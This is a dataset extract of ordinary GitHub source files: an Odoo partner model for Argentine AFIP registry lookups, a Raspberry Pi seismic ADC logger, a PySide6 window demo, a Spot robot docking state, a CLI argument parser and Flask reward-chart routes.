seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9339680077 | # -*- coding: utf-8 -*-
from odoo import fields, models, api, _
from odoo.exceptions import UserError
try:
from pysimplesoap.client import SoapFault
except ImportError:
SoapFault = None
import logging
_logger = logging.getLogger(__name__)
class ResPartner(models.Model):
_inherit = "res.partner"
# Commented-out legacy relation kept for reference.
#arba_alicuot_ids = fields.One2many(
#    'res.partner.tax',
#    'partner_id',
#    'Alícuotas PERC-RET',
#)
# Gross income registration number; label typo fixed (was "Burtos").
iibb_number = fields.Char('Ingresos Brutos')
#percepciones_ids = fields.One2many(
#    'res.partner.per',
#    'partner_id',
#    'Percepciones de cliente'
#)
# DREI (municipal registry) activity status.
drei = fields.Selection([
    ('activo', 'Activo'),
    ('no_activo', 'No Activo'),
],
    string='DREI',
)
# Default "ganancias" (income tax) regime applied on withholdings.
default_regimen_ganancias_id = fields.Many2one(
    'afip.tabla_ganancias.alicuotasymontos',
    'Regimen Ganancias por Defecto',
)
gross_income_number = fields.Char(
    'Número IIBB',
    size=64,
)
gross_income_type = fields.Selection([
    ('multilateral', 'Multilateral'),
    ('local', 'Local'),
    ('no_liquida', 'No Liquida'),
    ('reg_simplificado', 'Reg.Simplificado'),
],
    'Tipo IIBB',
)
gross_income_jurisdiction_ids = fields.Many2many(
    'res.country.state',
    string='Gross Income Jurisdictions',
    # help typo fixed: "cosidered" -> "considered"
    help='The state of the company is considered the main jurisdiction',
)
start_date = fields.Date(
'Start-up Date',
)
afip_responsability_type_id = fields.Many2one(
'l10n_ar.afip.responsability.type',
'AFIP Responsability Type',
auto_join=True,
index=True,
)
# From
# http://www.sistemasagiles.com.ar/trac/wiki/PadronContribuyentesAFIP
estado_padron = fields.Char(string='Estado AFIP')
imp_ganancias_padron = fields.Selection([
('NI', 'No Inscripto'),
('AC', 'Activo'),
('EX', 'Exento'),
# ('NA', 'No alcanzado'),
# ('XN', 'Exento no alcanzado'),
# ('AN', 'Activo no alcanzado'),
('NC', 'No corresponde'),
],
string='Ganancias',
)
imp_iva_padron = fields.Selection([
('NI', 'No Inscripto'),
('AC', 'Activo'),
('EX', 'Exento'),
('NA', 'No alcanzado'),
('XN', 'Exento no alcanzado'),
('AN', 'Activo no alcanzado'),
# ('NC', 'No corresponde'),
],
string='IVA',
)
integrante_soc_padron = fields.Selection(
[('N', 'No'), ('S', 'Si')],
'Integrante Sociedad',
)
monotributo_padron = fields.Selection(
[('N', 'No'), ('S', 'Si')],
'Monotributo',
)
actividad_monotributo_padron = fields.Char(string='Actividad Monotributo')
empleador_padron = fields.Boolean(string="Padrón Empleador")
#actividades_padron = fields.Many2many(
# 'afip.activity',
# 'res_partner_afip_activity_rel',
# 'partner_id', 'afip_activity_id',
# string='Actividades',
#)
#impuestos_padron = fields.Many2many(
# 'afip.tax',
# 'res_partner_afip_tax_rel',
# 'partner_id', 'afip_tax_id',
# string='Impuestos',
#)
#last_update_padron = fields.Date(
# 'Última Actualización del Padrón',
#)
#def get_arba_alicuota_percepcion(self):
# company = self._context.get('invoice_company')
# date_invoice = self._context.get('date_invoice')
# if date_invoice and company:
# date = fields.Date.from_string(date_invoice)
# arba = self.get_arba_data(company, date)
# return arba.alicuota_percepcion / 100.0
# return 0
#
#def get_arba_alicuota_retencion(self, company, date):
# arba = self.get_arba_data(company, date)
# return arba.alicuota_retencion / 100.0
#
#def get_arba_data(self, company, date):
# self.ensure_one()
# from_date = (date + relativedelta(day=1)).strftime('%Y%m%d')
# to_date = (date + relativedelta(
# day=1, days=-1, months=+1)).strftime('%Y%m%d')
# commercial_partner = self.commercial_partner_id
# arba = self.arba_alicuot_ids.search([
# ('from_date', '=', from_date),
# ('to_date', '=', to_date),
# ('company_id', '=', company.id),
# ('partner_id', '=', commercial_partner.id)], limit=1)
# if not arba:
# arba_data = company.get_arba_data(
# commercial_partner,
# from_date, to_date,
# )
# arba_data['partner_id'] = commercial_partner.id
# arba_data['company_id'] = company.id
# arba = self.arba_alicuot_ids.sudo().create(arba_data)
# return arba
#
#def update_constancia_from_padron_afip(self):
# self.ensure_one()
# return True
#
def get_data_from_padron_afip(self):
    """Query AFIP's "ws_sr_padron_a5" padron webservice for this
    partner's CUIT and return a dict of partner values ready to write().

    Raises:
        UserError: if no confirmed certificate is available, if the
            SOAP call fails, or if AFIP returns no name for the CUIT.
    """
    self.ensure_one()
    # cuit_required() raises a UserError when the partner has no CUIT.
    cuit = self.cuit_required()
    company = self.env.user.company_id
    env_type = company._get_environment_type()
    try:
        certificate = company.get_key_and_certificate(
            company._get_environment_type())
    except Exception:
        # The user's company has no usable certificate: fall back to any
        # confirmed certificate for this environment and use its company
        # for the webservice connection instead.
        certificate = self.env['afipws.certificate'].search([
            ('alias_id.type', '=', env_type),
            ('state', '=', 'confirmed'),
        ], limit=1)
        if not certificate:
            raise UserError(_(
                'Not confirmed certificate found on database'))
        company = certificate.alias_id.company_id
    padron = company.get_connection('ws_sr_padron_a5').connect()
    error_msg = _(
        'No pudimos actualizar desde padron afip al partner %s (%s).\n'
        'Recomendamos verificar manualmente en la página de AFIP.\n'
        'Obtuvimos este error: %s')
    try:
        padron.Consultar(cuit)
    except SoapFault as e:
        raise UserError(error_msg % (self.name, cuit, e.faultstring))
    except Exception as e:
        raise UserError(error_msg % (self.name, cuit, e))
    # AFIP sometimes answers with an empty name rendered as ', '.
    if not padron.denominacion or padron.denominacion == ', ':
        raise UserError(error_msg % (
            self.name, cuit, 'AFIP no devolvió nombre'))
    # Map AFIP's S/N IVA flag onto our selection codes.
    imp_iva = padron.imp_iva
    if imp_iva == 'S':
        imp_iva = 'AC'
    elif imp_iva == 'N':
        imp_iva = 'NI'
    vals = {
        'name': padron.denominacion,
        # 'name': padron.tipo_persona,
        # 'name': padron.tipo_doc,
        # 'name': padron.dni,
        'estado_padron': padron.estado,
        'street': padron.direccion,
        'city': padron.localidad,
        'zip': padron.cod_postal,
        # BUG FIX: the original also filled 'actividades_padron' and
        # 'impuestos_padron' via self.actividades_padron /
        # self.impuestos_padron, but those Many2many fields are
        # commented out on this model, so accessing them raised an
        # AttributeError at runtime.
        'imp_iva_padron': imp_iva,
        # TODAVIA no esta funcionando
        # 'imp_ganancias_padron': padron.imp_ganancias,
        'monotributo_padron': padron.monotributo,
        'actividad_monotributo_padron': padron.actividad_monotributo,
        'empleador_padron': padron.empleador == 'S',
        'integrante_soc_padron': padron.integrante_soc,
        #'last_update_padron': fields.Date.today(),
    }
    # Infer "impuesto a las ganancias" from the AFIP tax-id list:
    # 10/11 => inscripto, 12 => exento, monotributo => no corresponde.
    ganancias_inscripto = [10, 11]
    ganancias_exento = [12]
    if set(ganancias_inscripto) & set(padron.impuestos):
        vals['imp_ganancias_padron'] = 'AC'
    elif set(ganancias_exento) & set(padron.impuestos):
        vals['imp_ganancias_padron'] = 'EX'
    elif padron.monotributo == 'S':
        vals['imp_ganancias_padron'] = 'NC'
    else:
        # BUG FIX: added the missing space between the concatenated
        # string literals (was "youmust").
        _logger.info(
            "We couldn't get impuesto a las ganancias from padron, you "
            "must set it manually")
    if padron.provincia:
        # depending on the database, caba can have one of this codes
        caba_codes = ['C', 'CABA', 'ABA']
        # if not localidad then it should be CABA.
        if not padron.localidad:
            state = self.env['res.country.state'].search([
                ('code', 'in', caba_codes),
                ('country_id.code', '=', 'AR')], limit=1)
        # If localidad cant be caba
        else:
            state = self.env['res.country.state'].search([
                ('name', 'ilike', padron.provincia),
                ('code', 'not in', caba_codes),
                ('country_id.code', '=', 'AR')], limit=1)
        if state:
            vals['state_id'] = state.id
    # Infer the AFIP responsability type from the IVA situation.
    if imp_iva == 'NI' and padron.monotributo == 'S':
        vals['afip_responsability_type_id'] = self.env.ref(
            'l10n_ar.res_RM').id
    elif imp_iva == 'AC':
        vals['afip_responsability_type_id'] = self.env.ref(
            'l10n_ar.res_IVARI').id
    elif imp_iva == 'EX':
        vals['afip_responsability_type_id'] = self.env.ref(
            'l10n_ar.res_IVAE').id
    else:
        _logger.info(
            "We couldn't infer the AFIP responsability from padron, you "
            "must set it manually.")
    return vals
@api.constrains('gross_income_jurisdiction_ids', 'state_id')
def check_gross_income_jurisdictions(self):
    """Forbid listing the partner's own state among the gross income
    jurisdictions: that state is implicitly the main jurisdiction."""
    for rec in self:
        if rec.state_id and \
                rec.state_id in rec.gross_income_jurisdiction_ids:
            # BUG FIX: added the missing space before "from" in the
            # user-facing message (previously rendered "remove itfrom").
            raise UserError(_(
                'Jurisdiction %s is considered the main jurisdiction '
                'because it is the state of the company, please remove '
                'it from the jurisdiction list') % rec.state_id.name)
#class ResPartnerArbaAlicuot(models.Model):
#_name = "res.partner.tax"
#_order = "to_date desc, from_date desc, tag_id, company_id"
#
#partner_id = fields.Many2one(
# 'res.partner',
# required=True,
# ondelete='cascade',
#)
#tax_id = fields.Many2one(
# 'account.tax',
# 'Impuesto',
# domain=[('type_tax_use', '=', 'supplier')],
#)
#percent = fields.Float('Porcentaje',digits=(6,4))
#tag_id = fields.Many2one(
# 'account.account.tag',
# domain=[('applicability', '=', 'taxes')],
# change_default=True,
#)
#company_id = fields.Many2one(
# 'res.company',
# required=True,
# ondelete='cascade',
# default=lambda self: self.env.user.company_id,
#)
#from_date = fields.Date(
#)
#to_date = fields.Date(
#)
#numero_comprobante = fields.Char(
#)
#codigo_hash = fields.Char(
#)
#alicuota_percepcion = fields.Float(
#)
#alicuota_retencion = fields.Float(
#)
#grupo_percepcion = fields.Char(
#)
#grupo_retencion = fields.Char(
#)
#withholding_amount_type = fields.Selection([
# ('untaxed_amount', 'Untaxed Amount'),
# ('total_amount', 'Total Amount'),
#],
# 'Base para retenciones',
# help='Base amount used to get withholding amount',
#)
#regimen_percepcion = fields.Char(
# size=3,
# help="Utilizado para la generación del TXT para SIRCAR.\n"
# "Tipo de Régimen de Percepción (código correspondiente según "
# "tabla definida por la jurisdicción)"
#)
#regimen_retencion = fields.Char(
# size=3,
# help="Utilizado para la generación del TXT para SIRCAR.\n"
# "Tipo de Régimen de Retención (código correspondiente según "
# "tabla definida por la jurisdicción)"
#)
#api_codigo_articulo_retencion = fields.Selection([
# ('001', '001: Art.1 - inciso A - (Res. Gral. 15/97 y Modif.)'),
# ('002', '002: Art.1 - inciso B - (Res. Gral. 15/97 y Modif.)'),
# ('003', '003: Art.1 - inciso C - (Res. Gral. 15/97 y Modif.)'),
# ('004', '004: Art.1 - inciso D pto.1 - (Res. Gral. 15/97 y Modif.)'),
# ('005', '005: Art.1 - inciso D pto.2 - (Res. Gral. 15/97 y Modif.)'),
# ('006', '006: Art.1 - inciso D pto.3 - (Res. Gral. 15/97 y Modif.)'),
# ('007', '007: Art.1 - inciso E - (Res. Gral. 15/97 y Modif.)'),
# ('008', '008: Art.1 - inciso F - (Res. Gral. 15/97 y Modif.)'),
# ('009', '009: Art.1 - inciso H - (Res. Gral. 15/97 y Modif.)'),
# ('010', '010: Art.1 - inciso I - (Res. Gral. 15/97 y Modif.)'),
# ('011', '011: Art.1 - inciso J - (Res. Gral. 15/97 y Modif.)'),
# ('012', '012: Art.1 - inciso K - (Res. Gral. 15/97 y Modif.)'),
# ('013', '013: Art.1 - inciso L - (Res. Gral. 15/97 y Modif.)'),
# ('014', '014: Art.1 - inciso LL pto.1 - (Res. Gral. 15/97 y Modif.)'),
# ('015', '015: Art.1 - inciso LL pto.2 - (Res. Gral. 15/97 y Modif.)'),
# ('016', '016: Art.1 - inciso LL pto.3 - (Res. Gral. 15/97 y Modif.)'),
# ('017', '017: Art.1 - inciso LL pto.4 - (Res. Gral. 15/97 y Modif.)'),
# ('018', '018: Art.1 - inciso LL pto.5 - (Res. Gral. 15/97 y Modif.)'),
# ('019', '019: Art.1 - inciso M - (Res. Gral. 15/97 y Modif.)'),
# ('020', '020: Art.2 - (Res. Gral. 15/97 y Modif.)'),
#],
# string='Código de Artículo/Inciso por el que retiene',
#)
#api_codigo_articulo_percepcion = fields.Selection([
# ('021', '021: Art.10 - inciso A - (Res. Gral. 15/97 y Modif.)'),
# ('022', '022: Art.10 - inciso B - (Res. Gral. 15/97 y Modif.)'),
# ('023', '023: Art.10 - inciso D - (Res. Gral. 15/97 y Modif.)'),
# ('024', '024: Art.10 - inciso E - (Res. Gral. 15/97 y Modif.)'),
# ('025', '025: Art.10 - inciso F - (Res. Gral. 15/97 y Modif.)'),
# ('026', '026: Art.10 - inciso G - (Res. Gral. 15/97 y Modif.)'),
# ('027', '027: Art.10 - inciso H - (Res. Gral. 15/97 y Modif.)'),
# ('028', '028: Art.10 - inciso I - (Res. Gral. 15/97 y Modif.)'),
# ('029', '029: Art.10 - inciso J - (Res. Gral. 15/97 y Modif.)'),
# ('030', '030: Art.11 - (Res. Gral. 15/97 y Modif.)'),
#],
# string='Código de artículo Inciso por el que percibe',
#)
#api_articulo_inciso_calculo_selection = [
# ('001', '001: Art. 5º 1er. párrafo (Res. Gral. 15/97 y Modif.)'),
# ('002', '002: Art. 5º inciso 1)(Res. Gral. 15/97 y Modif.)'),
# ('003', '003: Art. 5° inciso 2)(Res. Gral. 15/97 y Modif.)'),
# ('004', '004: Art. 5º inciso 4)(Res. Gral. 15/97 y Modif.)'),
# ('005', '005: Art. 5° inciso 5)(Res. Gral. 15/97 y Modif.)'),
# ('006', '006: Art. 6º inciso a)(Res. Gral. 15/97 y Modif.)'),
# ('007', '007: Art. 6º inciso b)(Res. Gral. 15/97 y Modif.)'),
# ('008', '008: Art. 6º inciso c)(Res. Gral. 15/97 y Modif.)'),
# ('009', '009: Art. 12º)(Res. Gral. 15/97 y Modif.)'),
# ('010', '010: Art. 6º inciso d)(Res. Gral. 15/97 y Modif.)'),
# ('011', '011: Art. 5° inciso 6)(Res. Gral. 15/97 y Modif.)'),
# ('012', '012: Art. 5° inciso 3)(Res. Gral. 15/97 y Modif.)'),
# ('013', '013: Art. 5° inciso 7)(Res. Gral. 15/97 y Modif.)'),
# ('014', '014: Art. 5° inciso 8)(Res. Gral. 15/97 y Modif.)'),
#]
#api_articulo_inciso_calculo_percepcion = fields.Selection(
# api_articulo_inciso_calculo_selection,
# string='Artículo/Inciso para el cálculo percepción',
#)
#api_articulo_inciso_calculo_retencion = fields.Selection(
# api_articulo_inciso_calculo_selection,
# string='Artículo/Inciso para el cálculo retención',
#)
#class ResPartnerPer(models.Model):
# _name = "res.partner.per"
# _order = "company_id"
#
# partner_id = fields.Many2one(
# 'res.partner',
# required=True,
# ondelete='cascade',
# )
# tax_id = fields.Many2one(
# 'account.tax',
# 'Impuesto',
# domain=[('type_tax_use', '=', 'sale'),('tax_group_id.l10n_ar_tribute_afip_code','=','09')],
# )
# company_id = fields.Many2one(
# 'res.company',
# required=True,
# ondelete='cascade',
# default=lambda self: self.env.user.company_id,
# )
| codize-app/odoo-argentina | l10n_ar_withholding/models/res_partner.py | res_partner.py | py | 16,227 | python | es | code | 10 | github-code | 1 | [
{
"api_name": "pysimplesoap.client.SoapFault",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "logging.getLogger",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "odoo.models.Model",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "... |
14277710480 | import numpy
from obspy.core import read,Trace,Stream,UTCDateTime
import Queue
from threading import Thread
import os.path
import subprocess
import time
from scipy import signal
from scipy.interpolate import interp1d
import Adafruit_ADS1x15
sps = 250 #samples per second
adc = Adafruit_ADS1x15.ADS1115() #create class identifing model used
smoothing = 2 #this controls how much the values are smoothed, 1 is none , >1 is more smoothing
GAIN = 4
frequency = 50
period = 1.0 / frequency
deltaperiod = period*0.15
#this is how after how many samples a block is saved
#block_length=224
time1=1
block_length = int(time1*frequency)
#print block_length
#directories for data
mseed_directory = '/home/pi/RASP_ADC/mseed/'
os.system('rm '+mseed_directory+'*.mseed')
#declare the q from library
queue = Queue.Queue()
adc.start_adc_difference(0,gain=GAIN,data_rate=sps)
def read_data():
    """Producer loop: sample the ADC at ``frequency`` Hz forever and put
    [value, timestamp] packets on the shared queue.

    NOTE(review): timing is busy-waited and ``t1`` advances by a fixed
    ``period``, so packets are stamped with the *scheduled* sample time,
    not the actual read time — confirm this is intended.
    """
    value = 0
    startTime = time.time()  # Time of first sample
    t1 = startTime  # T1 is last sample time
    t2 = t1
    # t3=t1 # T2 is current time
    while True:
        # if ((t1-t3)/frequency>=0.1):
        # t3=t2
        # t2=t1
        # print 'aggiorno' # T3 aggiorno tempo
        # this array is for sample & sample_time
        packet = []
        # sample = adc.readADCDifferential23(256, sps)*1000
        # sample = adc.read_adc_difference(0, gain=GAIN)
        # sample = adc.get_last_result()
        # timenow=UTCDateTime()
        # this smooths the value, removing high freq
        # value += (sample - value ) / smoothing
        # packet[0]=value
        # packet[1]=timenow
        # packet[0]=adc.get_last_result()
        # packet[1]=UTCDateTime()
        # Latest reading from the ADC's continuous-conversion mode
        # (started at module level via start_adc_difference).
        packet.append(adc.get_last_result())
        packet.append(t1)  # scheduled sample time for this reading
        # print sample,timeno
        queue.put(packet)
        # Busy-wait until one sample period has elapsed since t1.
        while ((t2-t1) <= period):  # Check if t2-t1 is less then sample period, if it is then update t2
            t2 = time.time()  # and check again
        t1 += period  # Update last sample time by the sampling period
def test_data():
    """Consumer loop: once ``block_length`` packets are queued, assemble
    them into an ObsPy Stream and append it to today's MiniSEED file in
    ``mseed_directory``."""
    while True:
        if queue.qsize() >= block_length:
            # one arrays for reading samples into
            data = numpy.zeros([block_length], dtype=numpy.int16)
            # this is the loop without storing jitter value and calcs
            packet = queue.get()
            data[0] = packet[0]
            # Block start time = timestamp of the first packet.
            starttime = UTCDateTime(packet[1])
            queue.task_done()
            for x in range(1, block_length):
                packet = queue.get()
                data[x] = packet[0]
                queue.task_done()
            factor = 1  # decimation factor (decimation code is disabled below)
            ## tth = numpy.linspace(0,float(block_length-1)/frequency,block_length)
            ## f = interp1d(tth,data)
            ## g = signal.decimate(f(tth),factor,ftype='iir',zero_phase=True)
            samplingrate = 1 / (time1/float(block_length/factor))
            # print(avg_samplingrate)
            # MiniSEED trace header; npts/sampling_rate describe one block.
            stats = {'network': 'TV', 'station': 'RASPI', 'location': '00',
                     'channel': 'BHZ', 'npts': block_length/factor, 'sampling_rate': samplingrate,
                     'mseed': {'dataquality': 'D'}, 'starttime': starttime}
            sample_stream = Stream([Trace(data=data, header=stats)])
            ## sample_stream = Stream([Trace(data=g, header=stats)])
            # write sample data
            File = mseed_directory + str(sample_stream[0].stats.starttime.date) + '.mseed'
            temp_file = mseed_directory + ".temp.tmp"
            if os.path.isfile(File):
                # writes temp file, then merges it with the whole file, then removes file after
                sample_stream.write(temp_file, format='MSEED', reclen=512)
                # sample_stream.write(mseed_directory +UTCDateTime.now().isoformat()+".mseed",format='MSEED',reclen=512)
                subprocess.call("cat "+temp_file+" >> "+File, shell=True)
                subprocess.call(["rm", temp_file])
            else:
                # if this is the first block of day
                sample_stream.write(File, format='MSEED', reclen=512)
                # sample_stream.write(File,format='MSEED',encoding='INT16',reclen=512)
worker_sample = Thread(target=test_data)
#worker_sample = Thread(target=save_data)
worker_sample.start()
read_data()
| SpinaCianetti/RASP_ADC | leggi_dati_coda.py | leggi_dati_coda.py | py | 5,153 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "Adafruit_ADS1x15.ADS1115",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path.system",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "Queue.Queue",
"li... |
21232514403 | import sys
from PySide6.QtWidgets import QApplication, QPushButton, QGridLayout, QWidget, QBoxLayout, QMainWindow
app = QApplication(sys.argv)
window = QMainWindow()
central_widget = QWidget()
window.setCentralWidget(central_widget)
window.setWindowTitle('Minha janela bonita')
button_1 = QPushButton('Button 1')
button_1.setStyleSheet('font-size: 40px; color: red;')
button_2 = QPushButton('Button 2')
button_2.setStyleSheet('font-size: 40px; color: blue')
button_3 = QPushButton('Button 3')
button_3.setStyleSheet('font-size: 40px; color: green;')
layout = QGridLayout()
central_widget.setLayout(layout)
layout.addWidget(button_1, 1, 1, 1, 1)
layout.addWidget(button_2, 1, 2, 1, 1)
layout.addWidget(button_3, 3, 1, 1, 2)
def slot_example(status_bar):
    """Example slot: display a fixed confirmation message on the status bar."""
    message = 'O meu slot foi executado'
    status_bar.showMessage(message)
status_bar = window.statusBar()
status_bar.showMessage('Mostrar mensagem na barra')
menu = window.menuBar()
primeiro_menu = menu.addMenu('Primeiro menu')
primeira_acao = primeiro_menu.addAction('Primeira ação')
primeira_acao.triggered.connect(
lambda: slot_example(status_bar)
)
# central_widget.show()
window.show()
app.exec()
| RossettiBR/curso-python-atualizado | pyside6/04_qmaiwindow_centralwidget.py | 04_qmaiwindow_centralwidget.py | py | 1,155 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "PySide6.QtWidgets.QApplication",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "PySide6.QtWidgets.QMainWindow",
"line_number": 5,
"usage_type": "call"
},
{
"api_name"... |
40255581254 | #!/usr/bin/env python
import rospy
from flexbe_core import EventState, Logger
from bosdyn.client.util import *
from bosdyn.client.lease import LeaseClient, LeaseKeepAlive
from bosdyn.client.frame_helpers import get_odom_tform_body
from bosdyn.api.graph_nav import nav_pb2, graph_nav_pb2
from bosdyn.client.robot_state import RobotStateClient
from bosdyn.client.graph_nav import GraphNavClient
from bosdyn.client import robot_command
from bosdyn.client.docking import DockingClient, blocking_dock_robot, blocking_undock, get_dock_id
from bosdyn.client.lease import LeaseClient
from bosdyn.client.license import LicenseClient
import math
import keyboard
class SwapLease(EventState):
    """FlexBE state that streams Spot robot state and can dock/undock the
    robot at a given dock id.

    Args:
        dock_id: id of the dock to dock at / undock from.

    Outcomes:
        continue: state finished normally.
        failed: reserved failure outcome (currently never returned).
    """

    def __init__(self, dock_id):
        # Declare outcomes and input keys via the FlexBE super constructor.
        super(SwapLease, self).__init__(
            outcomes=['continue', 'failed'],
            input_keys=['lease', 'robot_command_client', 'license_client',
                        'robot', 'state_client'])
        self._dock_id = dock_id
        # BUG FIX: the original assigned the *type* ``bool`` as a
        # placeholder; initialize with an actual boolean value instead.
        self._return_failure = False

    def execute(self, userdata):
        # All work is done in on_enter(); always report success here.
        return 'continue'

    def should_dock(self, userdata, dock):
        """Dock (dock=True) or undock (dock=False) the robot, recording
        the outcome in self._return_failure."""
        if dock:
            print("docking the robot at ", self._dock_id)
            robot_command.blocking_stand(userdata.robot_command_client)
            blocking_dock_robot(userdata.robot, self._dock_id)
            self._return_failure = False
            print("successfully docked the robot at the given dock id............................")
        else:
            print("undocking the robot....................")
            dock_id = get_dock_id(userdata.robot)
            print("dock_id found is ", dock_id)
            print("dock_id given is ", self._dock_id)
            if dock_id != self._dock_id:
                # The robot is not on the dock we expected; refuse to undock.
                print("dock ids doesn't match..........................")
                self._return_failure = True
            else:
                blocking_undock(userdata.robot)
                self._return_failure = False
                print("successfully undocked the robot from dock id ", dock_id, "......................")

    def on_enter(self, userdata):
        # Called when the state becomes active: verify the docking license,
        # then stream robot state until the Enter key is pressed.
        print("on enter.........")
        if not userdata.license_client.get_feature_enabled(
                [DockingClient.default_service_name])[DockingClient.default_service_name]:
            print('This robot is not licensed for docking.')
            # NOTE(review): ``sys`` is only available via the wildcard
            # ``bosdyn.client.util`` import — confirm, or import it here.
            sys.exit(1)
        # with LeaseKeepAlive(userdata.lease):
        #     userdata.robot.power_on()
        #     self.should_dock(userdata, False)
        while True:
            if keyboard.is_pressed("enter"):
                print("Exiting the loop...............")
                break
            else:
                print("--------------------------------------@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@--------------------------")
                print(userdata.state_client.get_robot_state())
                print("----------------------------------------------------------------")
        # self.should_dock(userdata, True)
        print("done on enter............")

    def on_exit(self, userdata):
        # Called when an outcome is returned; nothing to clean up here.
        pass

    def on_start(self):
        # Called when the behavior is started; resources are created in
        # __init__, so nothing to do.
        pass

    def on_stop(self):
        # Called whenever the behavior stops, including cancellation.
        pass
| yashpatel1392/spot_nav_behaviors | spot_nav_flexbe_states/src/spot_nav_flexbe_states/swap_lease.py | swap_lease.py | py | 4,565 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flexbe_core.EventState",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "bosdyn.client.robot_command.blocking_stand",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "bosdyn.client.robot_command",
"line_number": 44,
"usage_type": "name"
... |
74659052512 | import argparse
import re
from datetime import datetime
from cli.models.models import CliData, PHONE, LOGIN, PASSWORD, SIP_DEVICE, \
SIP_ENABLED, IDENTIFY_LINE
from cli.utils.help_message import *
CHOICE_FILTER = ['all', 'activate', 'deactivate']
CHOICE_ACTION = ['a', 'd']
CHOICE_VIEW = [PHONE, LOGIN, PASSWORD, SIP_DEVICE, SIP_ENABLED, IDENTIFY_LINE]
class NumsAction(argparse.Action):
    """Custom argparse action: splits a string of numbers separated by
    spaces or newlines into a list and stores it on the namespace."""

    def __init__(self, option_strings, dest, nargs=None, **kwargs):
        # ``nargs`` is accepted but deliberately not forwarded to the base
        # class, matching the original behavior.
        super().__init__(option_strings, dest, **kwargs)

    def __call__(self, parser, namespace, values, option_string=None):
        tokens = re.split('\n| ', values)
        setattr(namespace, self.dest, tokens)
def arg_parse() -> CliData:
    """Parse the command line and return a populated CliData model.

    The default export filename embeds the current timestamp, e.g.
    ``vats_2023-01-31_12-00.xlsx``; it is only used when ``-f`` is given
    with no value.
    """
    time_fmt = "%Y-%m-%d_%H-%M"
    timestamp = datetime.strftime(datetime.now(), format=time_fmt)
    filename = f'vats_{timestamp}.xlsx'
    arg_engine = argparse.ArgumentParser(prog='cli')
    # -f: export file. Bare "-f" -> generated name (const); omitted -> None.
    arg_engine.add_argument("-f",
                            type=str,
                            nargs='?',
                            const=filename,
                            default=None,
                            dest='filename',
                            help=HELP_F)
    # -l: presence of the flag *disables* display (store_false).
    arg_engine.add_argument("-l",
                            action="store_false",
                            dest='display',
                            help=HELP_L)
    # -v: which fields to show; defaults to everything.
    arg_engine.add_argument("-v",
                            type=str,
                            nargs='+',
                            help=HELP_V,
                            default=['all', ],
                            dest='view',
                            choices=CHOICE_VIEW)
    # --action: activate ('a') / deactivate ('d') operations.
    arg_engine.add_argument("--action",
                            type=str,
                            nargs='+',
                            default=None,
                            dest='action',
                            choices=CHOICE_ACTION,
                            help=HELP_ACTION)
    arg_engine.add_argument("--login",
                            type=str,
                            dest='login',
                            required=True,
                            help=HELP_LOGIN)
    # --nums: whitespace/newline separated numbers, split by NumsAction.
    arg_engine.add_argument("--nums",
                            type=str,
                            nargs='+',
                            dest="nums",
                            action=NumsAction,
                            help=HELP_NUMS)
    arg_engine.add_argument("--filter",
                            nargs='?',
                            default='all',
                            dest='filter',
                            choices=CHOICE_FILTER,
                            help=HELP_FILTER)
    args = arg_engine.parse_args()
    # Hydrate the pydantic-style CliData model from the parsed namespace.
    cli_data = CliData(**vars(args))
    return cli_data
| Kotletta-TT/cbot-cm-trunk-producer-mts | cli/utils/arg_parse.py | arg_parse.py | py | 2,873 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "cli.models.models.PHONE",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "cli.models.models.LOGIN",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "cli.models.models.PASSWORD",
"line_number": 11,
"usage_type": "name"
},
{
"api_na... |
39483432719 | import json
from datetime import datetime, timedelta
from app import app, db, models
from flask import render_template, jsonify, request
@app.route('/')
@app.route('/index')
def index():
    """Render the main page for the user given by the ?username= query arg."""
    name = request.args.get('username')
    if name is None:
        return 'user name must be specified as ?username=xxx'
    return render_template('index.html', username=name)
@app.route('/admin')
def admin():
    """Render the admin page for the user given by the ?username= query arg."""
    name = request.args.get('username')
    if name is None:
        return 'user name must be specified as ?username=xxx'
    return render_template('admin.html', username=name)
@app.route('/_add_star', methods=['GET', 'POST'])
def add_star():
    """Create one star record for ?username=, with optional ?reason=
    and ?timestamp= (epoch seconds) query args."""
    model = db.get_model()
    username = request.args.get('username')
    if username is None:
        return 'Exception: user name not specified'
    reason = request.args.get('reason')
    if reason is not None:
        app.logger.info('setting reason to ' + reason)
    # NOTE(review): timestamp appears to be required in practice —
    # int(None) below raises TypeError when ?timestamp= is missing;
    # confirm all callers always send it.
    timestamp = request.args.get('timestamp')
    s = models.Score(username=username, reason=reason, timestamp=int(timestamp))
    model.create(username, s.to_dict())
    return 'Star added'
@app.route('/_reset_star', methods=['POST'])
def reset_star():
    """Delete all stars belonging to the user given by ?username=."""
    model = db.get_model()
    user = request.args.get('username')
    if user is None:
        return 'Exception: user name not specified'
    model.reset(user)
    return 'Star reset'
@app.route('/_get_stars', methods=['GET'])
def get_star():
    """Return the user's stars as JSON, stripping the internal _id field."""
    model = db.get_model()
    user = request.args.get('username')
    records = model.list(user)
    for record in records:
        record.pop('_id', None)
    return jsonify(records)
@app.route('/_get_stars_count', methods=['GET'])
def get_stars_count():
    """Return the number of stars for the user given by ?username=.

    NOTE(review): if model.count() returns an int, Flask cannot use it
    directly as a response body (views must return str/bytes/dict/
    Response) — confirm the model's return type, or wrap in str().
    """
    model = db.get_model()
    username = request.args.get('username')
    stars_count = model.count(username)
    return stars_count
| laofeizhu/reward_chart | app/routes.py | routes.py | py | 1,765 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.request.args.get",
"line_number": 11,
"usage_type": "call"
},
{
